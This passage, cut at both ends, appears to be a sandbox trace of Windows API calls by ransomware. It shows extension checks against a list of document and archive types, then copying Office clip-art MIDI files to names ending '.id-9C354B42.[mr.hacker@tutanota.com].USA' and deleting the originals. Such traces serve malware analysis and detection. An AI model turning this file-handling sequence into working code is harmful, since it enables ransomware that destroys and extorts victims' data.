(lpString1=".doc", lpString2=".MID") returned -1 [0268.808] lstrlenW (lpString=".docx") returned 5 [0268.808] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0268.808] lstrlenW (lpString=".pdf") returned 4 [0268.808] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.809] lstrlenW (lpString=".xls") returned 4 [0268.809] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.809] lstrlenW (lpString=".xlsx") returned 5 [0268.809] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0268.809] lstrlenW (lpString=".ppt") returned 4 [0268.809] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.809] lstrlenW (lpString=".zip") returned 4 [0268.809] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.809] lstrlenW (lpString=".rar") returned 4 [0268.809] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.809] lstrlenW (lpString=".bz2") returned 4 [0268.809] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.809] lstrlenW (lpString=".7z") returned 3 [0268.809] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.809] lstrlenW (lpString=".dbf") returned 4 [0268.809] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.809] lstrlenW (lpString=".1cd") returned 4 [0268.809] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0268.809] lstrlenW (lpString=".jpg") returned 4 [0268.809] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.809] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.809] lstrlenW (lpString="SHOW_01.MID") returned 11 [0268.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.124] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=6392) returned 1 [0269.124] CloseHandle (hObject=0x384) returned 1 [0269.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid")) returned 0x20 [0269.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.182] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.182] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.182] GetLastError () returned 0x0 [0269.182] ReadFile (in: hFile=0x384, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x18f8, lpOverlapped=0x0) returned 1 [0269.186] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1900, lpOverlapped=0x0) returned 1 [0269.187] ReadFile (in: hFile=0x384, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.187] WriteFile (in: hFile=0x388, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.187] SetEndOfFile (hFile=0x388) returned 1 [0269.188] CloseHandle (hObject=0x388) returned 1 [0269.188] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.188] SetEndOfFile (hFile=0x384) returned 1 [0269.190] CloseHandle (hObject=0x384) returned 1 [0269.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.220] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid")) returned 1 [0269.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.228] lstrlenW (lpString=".doc") returned 4 [0269.228] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.228] lstrlenW (lpString=".docx") returned 5 [0269.228] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.228] lstrlenW (lpString=".pdf") returned 4 [0269.228] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.228] lstrlenW (lpString=".xls") returned 4 [0269.228] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.228] lstrlenW (lpString=".xlsx") returned 5 [0269.228] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.228] lstrlenW (lpString=".ppt") returned 4 [0269.228] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.229] lstrlenW (lpString=".zip") returned 4 [0269.229] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.229] lstrlenW (lpString=".rar") returned 4 [0269.229] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.229] lstrlenW (lpString=".bz2") returned 4 [0269.229] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.229] lstrlenW (lpString=".7z") returned 3 [0269.229] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.229] lstrlenW (lpString=".dbf") returned 4 [0269.229] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.229] lstrlenW (lpString=".1cd") returned 4 [0269.229] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.229] lstrlenW (lpString=".jpg") returned 4 [0269.229] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.229] lstrlenW (lpString=".doc") returned 4 [0269.229] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.229] lstrlenW (lpString=".docx") returned 5 [0269.229] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.229] lstrlenW (lpString=".pdf") returned 4 [0269.229] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.229] lstrlenW (lpString=".xls") returned 4 [0269.229] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.229] lstrlenW (lpString=".xlsx") returned 5 [0269.230] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.230] lstrlenW (lpString=".ppt") returned 4 [0269.230] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.230] lstrlenW (lpString=".zip") returned 4 [0269.230] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.230] lstrlenW (lpString=".rar") returned 4 [0269.230] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.230] lstrlenW (lpString=".bz2") returned 4 [0269.230] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.230] lstrlenW (lpString=".7z") returned 3 [0269.230] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.230] lstrlenW (lpString=".dbf") returned 4 [0269.230] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.230] lstrlenW (lpString=".1cd") returned 4 [0269.230] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 62 [0269.230] lstrlenW (lpString=".jpg") returned 4 [0269.230] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.230] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0269.230] lstrlenW (lpString="URBAN_01.MID") returned 12 [0269.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.231] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=13358) returned 1 [0269.231] CloseHandle (hObject=0x388) returned 1 [0269.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 0x20 [0269.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.231] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.231] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.232] GetLastError () returned 0x0 [0269.232] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x342e, lpOverlapped=0x0) returned 1 [0269.233] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x3430, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x3430, lpOverlapped=0x0) returned 1 [0269.235] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.235] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.235] SetEndOfFile (hFile=0x384) returned 1 [0269.235] CloseHandle (hObject=0x384) returned 1 [0269.235] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.235] SetEndOfFile (hFile=0x388) returned 1 [0269.238] CloseHandle (hObject=0x388) returned 1 [0269.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 1 [0269.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.239] lstrlenW (lpString=".doc") returned 4 [0269.239] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.239] lstrlenW (lpString=".docx") returned 5 [0269.239] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.239] lstrlenW (lpString=".pdf") returned 4 [0269.240] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.240] lstrlenW (lpString=".xls") returned 4 [0269.240] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.240] lstrlenW (lpString=".xlsx") returned 5 [0269.240] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.240] lstrlenW (lpString=".ppt") returned 4 [0269.240] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.240] lstrlenW (lpString=".zip") returned 4 [0269.240] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.240] lstrlenW (lpString=".rar") returned 4 [0269.240] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.240] lstrlenW (lpString=".bz2") returned 4 [0269.240] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.240] lstrlenW (lpString=".7z") returned 3 [0269.240] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.240] lstrlenW (lpString=".dbf") returned 4 [0269.240] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.240] lstrlenW (lpString=".1cd") returned 4 [0269.240] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.240] lstrlenW (lpString=".jpg") returned 4 [0269.240] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.240] lstrlenW (lpString=".doc") returned 4 [0269.240] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.240] lstrlenW (lpString=".docx") returned 5 [0269.241] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.241] lstrlenW (lpString=".pdf") returned 4 [0269.241] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.241] lstrlenW (lpString=".xls") returned 4 [0269.241] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.241] lstrlenW (lpString=".xlsx") returned 5 [0269.241] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.241] lstrlenW (lpString=".ppt") returned 4 [0269.241] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.241] lstrlenW (lpString=".zip") returned 4 [0269.241] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.241] lstrlenW (lpString=".rar") returned 4 [0269.241] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.241] lstrlenW (lpString=".bz2") returned 4 [0269.241] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.241] lstrlenW (lpString=".7z") returned 3 [0269.241] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.241] lstrlenW (lpString=".dbf") returned 4 [0269.241] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.241] lstrlenW (lpString=".1cd") returned 4 [0269.241] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0269.241] lstrlenW (lpString=".jpg") returned 4 [0269.241] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.242] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0269.242] lstrlenW (lpString="VCTRN_01.MID") returned 12 [0269.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.243] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=4961) returned 1 [0269.243] CloseHandle (hObject=0x388) returned 1 [0269.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid")) returned 0x20 [0269.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.243] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.243] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.244] GetLastError () returned 0x0 [0269.244] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1361, lpOverlapped=0x0) returned 1 [0269.246] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1370, lpOverlapped=0x0) returned 1 [0269.247] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.247] WriteFile (in: hFile=0x384, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.247] SetEndOfFile (hFile=0x384) returned 1 [0269.247] CloseHandle (hObject=0x384) returned 1 [0269.247] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.247] SetEndOfFile (hFile=0x388) returned 1 [0269.249] CloseHandle (hObject=0x388) returned 1 [0269.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.250] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid")) returned 1 [0269.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.250] lstrlenW (lpString=".doc") returned 4 [0269.250] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.250] lstrlenW (lpString=".docx") returned 5 [0269.250] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.250] lstrlenW (lpString=".pdf") returned 4 [0269.250] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.250] lstrlenW (lpString=".xls") returned 4 [0269.250] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.250] lstrlenW (lpString=".xlsx") returned 5 [0269.250] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.250] lstrlenW (lpString=".ppt") returned 4 [0269.250] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.251] lstrlenW (lpString=".zip") returned 4 [0269.251] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.251] lstrlenW (lpString=".rar") returned 4 [0269.251] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.251] lstrlenW (lpString=".bz2") returned 4 [0269.251] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.251] lstrlenW (lpString=".7z") returned 3 [0269.251] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.251] lstrlenW (lpString=".dbf") returned 4 [0269.251] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.251] lstrlenW (lpString=".1cd") returned 4 [0269.251] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.251] lstrlenW (lpString=".jpg") returned 4 [0269.251] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.251] lstrlenW (lpString=".doc") returned 4 [0269.251] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.251] lstrlenW (lpString=".docx") returned 5 [0269.251] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.251] lstrlenW (lpString=".pdf") returned 4 [0269.251] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.251] lstrlenW (lpString=".xls") returned 4 [0269.251] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.252] lstrlenW (lpString=".xlsx") returned 5 [0269.252] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.252] lstrlenW (lpString=".ppt") returned 4 [0269.252] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0269.252] lstrlenW (lpString=".zip") returned 4 [0269.252] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.252] lstrlenW (lpString=".rar") returned 4 [0269.252] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.252] lstrlenW 